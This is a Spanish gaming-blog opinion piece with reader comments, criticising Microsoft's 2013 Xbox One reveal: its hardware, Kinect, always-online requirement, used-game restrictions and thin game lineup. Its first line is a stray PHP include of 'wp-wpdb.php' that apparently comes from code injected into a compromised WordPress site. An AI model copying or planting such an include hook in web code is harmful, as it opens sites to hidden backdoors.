if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Xbox One: Hablemos de juegos – La Fortaleza de LeChuck

Xbox One: Hablemos de juegos

Las cartas están sobre la mesa. Como viene siendo costumbre, Microsoft también hace un feo al E3 y hoy nos ha presentado en una conferencia la nueva Xbox, que no será Infinity, y mucho menos Xbox 720, sino Xbox One. Así bautiza Microsoft su nueva consola, con la idea ya profetizada por muchos de seguir unificando las consolas con la televisión y toda clase de contenidos multimedia. Pero los que nos pertoca a nosotros es hablar de la consola y de los juegos, y desgraciadamente las conferencias están cada día más encarriladas hacia un público que no las mira, y los gamers que las miramos pues… opinamos sobre los pocos juegos y declaramos un ganador.

Diseño Xbox One

Y ahí es cuando entran los favoritismos, ahora muchos no ven tan mala la presentación de PS4 después de reírse de ella durante días por no haber enseñado la consola físicamente. Por suerte eso es algo que sí ha hecho Microsoft. El diseño de Xbox One es todo lo discreto posible (Un tocho más en tu salón) para pasar por «un aparato más al lado de la televisión». Cualquiera lo confundiría con un Home Cinema o un lector Blu Ray, pero es la nueva Xbox One. Destaca por un diseño más grande que Xbox 360 (Con vistas a sacar una Xbox One Slim en dos años, claramente) y unas líneas, como decía, muy simples, rectangulares y nada cantosas. La idea es tener una consola de videojuegos en el salón pero que no parezca que es tal, para cuando visiten tu casa por primera vez tus suegros no crean que eres un asesino. Bien visto Microsoft.
Mando Xbox One

El mando es una pequeña evolución del propio de Xbox 360, parece que no hace falta nada para mejorar el mejor mando de la generación, pero la verdad es que el nuevo diseño se ve mejor que nunca.  Una de las novedades que incluye, es la vibración individual en cada uno de los gatillos L y R, además del principal, de toda la vida, en el centro del mando. Esto ayudará a dividir la vibración para cada función y potenciará así la inmersión. Los Sticks parecen tener una mayor profundidad y mejorado agarre. La cruceta digital también parece que no comete el error de la primera versión de su padre en Xbox 360, y de primeras se muestra más consistente, aunque sigue relegado a ser un botón más bien secundario que se suele utilizar para cambiar opciones más que para controlar el movimiento del personaje jugable. Seguirá funcionando con pilas recargables, si el mando peta, que sea por uso y no porque la batería ha dicho basta. Kit Carga y Juega «incoming».

Nuevo Kinect

El sensor de movimiento de Microsoft vendrá esta vez incluido con la consola, y ha sido mejorado alcanzando una resolución de 1080p y grabación a 30FPS, cosa que le permitirá detectar mucho mejor nuestros movimientos. Será obligatorio tenerlo para jugar con la consola, y la interfaz de la consola será controlable a través de el, tanto por gestos como por voz. Hay que ver todavía si vendrá en español, en mexicano, o en algún idioma con el que podamos interactuar con el cacharro. En todo caso, como punto negativo y polémico, comentar que Kinect siempre estará encendido esperando tus indicaciones para encender la consola, por tanto, estará «con la oreja puesta» durante todo el día. Microsoft ha declarado que la privacidad será total, y solo hará caso a las «órdenes Kinect».

Características Técnicas Xbox One
Procesador de 8 Núcleos, 8GB de RAM, lector Blu Ray (¿No esperaríais el retorno del HD-DVD?),  500GB de disco duro (Ampliable por USB, y éstos totalmente operativos desde el principio para la instalación de juegos) y muchos fluzos que se supone dará a la consola la posibilidad de hacernos creer que estamos en una nueva generación. Aunque la resolución principal será 1080P FULL HD, se ha confirmado que será compatible con las 4k, aunque no apostamos a que sea un estándar después de lo visto esta generación. La RAM se va a notar mucho para la ejecución de la interfaz en segundo plano y con rápidas respuestas respecto al juego. Recordemos que la actual generación andaba escasa de RAM y era uno de los problemas para moverse por las interfaces, que han evolucionado durante los últimos años hasta ser algo más que poner el juego y darle al start.
Primeros juegos Xbox One
Muchas aplicaciones para ver la televisión y manejar la interfaz con Kinect por gestos y por voz, pero bastante han tardado en aparecer los juegos y… bueno, casi un calco de la presentación y algún E3 de Xbox 360. FORZA, su «Alan Wake» de Remedy, los deportivos de EA y Call of Duty Ghosts para abrir boca, y prometen 15 juegos más exclusivos para la salida de la consola que, es de suponer, enseñarán en el E3. La verdad es que todo han sido tráilers sin nada de «Gameplay», por lo que tampoco nos han logrado sorprender por el lado de los juegos.

FORZA 5

Quantum Break
EA Sports: FIFA, UFC, MADDEN, NBA LIVE…
Call of Duty: Ghosts

Detalles a tener en cuenta. Xbox One sí necesita

Xbox One necesita Internet cada 24h

Xbox One no va a necesitar Internet continuo para jugar y no cortará de cuajo con la segunda mano, pero cuando el río suena agua lleva, será necesario conectarla al menos una vez al día, para parches, actualizaciones del dashboard, etc. Vamos que, realmente, Xbox One, tras tanto dar la vuelta a los rumores por parte de Microsoft, Xbox One sí necesita de conexión a Internet continua. La clara tendencia a utilizar la nube y muchos datos de Internet, marcará un claro agujero en la consola cuando no esté conectada.

Xbox one bloquea el préstamo de tus videojuegos y la segunda mano

Además, la segunda mano si se verá de alguna forma, afectada por un nuevo sistema «Para que instalemos los juegos en el disco duro y no tengamos que poner el disco cada vez». Tal como lo lees, Microsoft ha decidido que Xbox One necesitará la instalación de cada uno de sus juegos en su totalidad en la memoria de la consola y quedará asociada a tu cuenta, cosa que comporta que si el mismo disco es reutilizado de nuevo, habrá que volver a pagar por el juego con el precio que tenga en ese momento en el mercado, al estilo de los Pases Online, pero incluso peor. Ahora entendemos porque EA quitaba el Pase Online, ya no le hará falta en la consola de Microsoft. Aquí hemos de ver si el público castiga a Microsoft con bajas ventas o se come esta «ley» metida con calzador, que tampoco gustará a las tiendas de videojuegos, ya que desde hace tiempo se nutren de la segunda mano de videojuegos más que de la primera. Microsoft se ha apresurado a matizar, que aún habiendo registrado un juego en tu cuenta,  podrás vender la licencia de uso digitalmente cuando ya no lo quieras. Vamos, que posiblemente apuesten por un sistema de segunda mano digital al estilo del que anunció hace unas semanas Amazon en los libros electrónicos. No hay mal que por bien no venga, por lo menos podremos comenzar a jugar mientras se instala, por lo tanto una de las peores cosas que nos trajo la actual generación se van a ver reducidas en Xbox One. Microsoft sólo nos permitirá jugar a nuestros juegos bajo nuestra cuenta en otras consolas, cosa que ya ocurría con Xbox 360 cuando hablamos de juegos digitales.

Otro de los peros que nos encontramos es que Xbox One no será retrocompatible con los juegos de Xbox 360. Era algo esperado al cambiar totalmente de arquitectura pero es algo que a los primeros compradores puede también tirar para atrás. Cuando una consola se cultiva un buen catálogo, ya suele dar igual la retrocompatibilidad, así que esperamos que sea por esto la confianza de Microsoft de que habrá grandes juegos y no les hará falta tirar del pasado.

Por el lado positivo (Creo) una de las mejoras es a la hora de esperar en la búsqueda de una partida Online en MatchMaking. Ahora podremos acceder a cualquier otro uso de la consola (¿Quién no le da al «Inicio» en PC cuando ve que tarda mucho en cargar algo para aprovechar el tiempo?). Espero que esto no quiera decir que habrá que esperar más de lo habitual, aunque doy por hecho que en el próximo Halo si será útil.

La suscripción de Xbox Live Gold actual será totalmente válida en Xbox One, por lo que sobreentendemos que Xbox Live seguirá siendo de pago y tendrá el mismo precio, aunque con mejores servicios como un guardado en la nube más completo, donde no solo guardaremos partidas guardadas, sino también juegos, videos, música, capturas, etc.

El lanzamiento de Xbox One está programado para finales de este año 2013 de forma simultánea en todo el mundo y se rumorea un precio entorno a los 500$, aunque totalmente por confirmar. De momento,  podéis pre-reservar Xbox One desde aquí si os ha convencido.

Conclusiones

Desde que ha terminado la conferencia, no paran de salir a la luz nuevas noticias aclarando cosas que no se suelen decir de cara sobre la consola, ya que posiblemente nadie las aplaudiría, y eso nos ha desmotivado bastante como gamers. Microsoft se ha dedicado a encarar esta presentación de su nueva Xbox One a la prensa generalista, intentando sorprenderles con aplicaciones casuals para ganarse algún titular, pero nada me ha resultado realmente innovador y Xbox One resulta ser una consola muy continuista, que necesitará de un buen catálogo para hacer olvidar algunos malos tragos. Nintendo lanzó mal Wii U, Sony también presentó la PlayStation 4 de una forma bastante nefasta y Microsoft tampoco ha sabido contentar a los jugadores en la presentación de Xbox One. Me pregunto si somos nosotros que pedimos mucho, si ni siquiera sabemos lo que queremos, o realmente los videojuegos están tomando un tinte cada vez más oscuro. Al menos espero que algún día compatibilicen las prometedoras Oculus Rift.

Publicada el
Categorizado como Opinión

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

8 comentarios

  1. Las artimañas para sacar provecho de la 2ª mano me parecen bastante tristes. Además del plus que se habrá de pagar por tener la Xbox One retrocompatible. Esos dos factores son decisivos para mi NO compra

  2. Desde luego, se han cubierto de gloria. Y la característica más laureada, la de la TV integrada, solo estará disponible en USA al principio, y con aparato aparte.

    Por lo que he visto, han hecho una consola por y para los americanos. Mucha Tv, con series y películas (HBO y CBS asomando por todos lados, y la peli de Star Trek de promo por medio), muchos deportes nacionales con NBA,

    1. Sin duda los americanos son así. Si te fijas, EA, Activision… el apoyo americano es total, son muy patriotas, así que lo primero para ellos es ganar el partido allí, que es donde pueden sacar más tajada.

      Pero tienes toda la razón, todas esas funciones, como las que decía por el idioma, se van a quedar en nada, y como comentábamos en Twitter… al final, lo que nos importa son los

  3. Muy buen artículo. Venía buscando algo de información sobre la nueva consola de Microsoft y podría decirse que me he "empapado" de ello. Nada más lejos de la realidad, me parece extraer tanto por el contenido de dicho artículo como por criterio propio más puntos negativos que positivos. Por otro lado, algo me dice que tanto el diseño como la forma en que está pensada la arquitectura de

    1. Nadie tiene que adaptarse necesariamente. Simplemente, si no gusta, no se compra.

      Por cierto, me he reido mucho en la conferencia y los comentarios de la gente.

      No he mostrado una pizca de decepción, porque yo ya no espero nada de las videoconsolas desde al final de la vida de la generación 128 bits.
      Eso sí, tanto PS4 como Xbox one, me han parecido unas

  4. Si mi interés previo a la conferencia era poco, tras ella puedo decir que es nulo. Me parece que la Xbox 360 va a ser la consola más moderna que voy a poseer por los siglos de los siglos y eso que ahora ni juego a ella.

    La presentación me ha resultado insulsa, enfocada desde el principio a mostrar sus "moderneces" que poco o nada tienen que ver con los videojuegos.

Dejar un comentario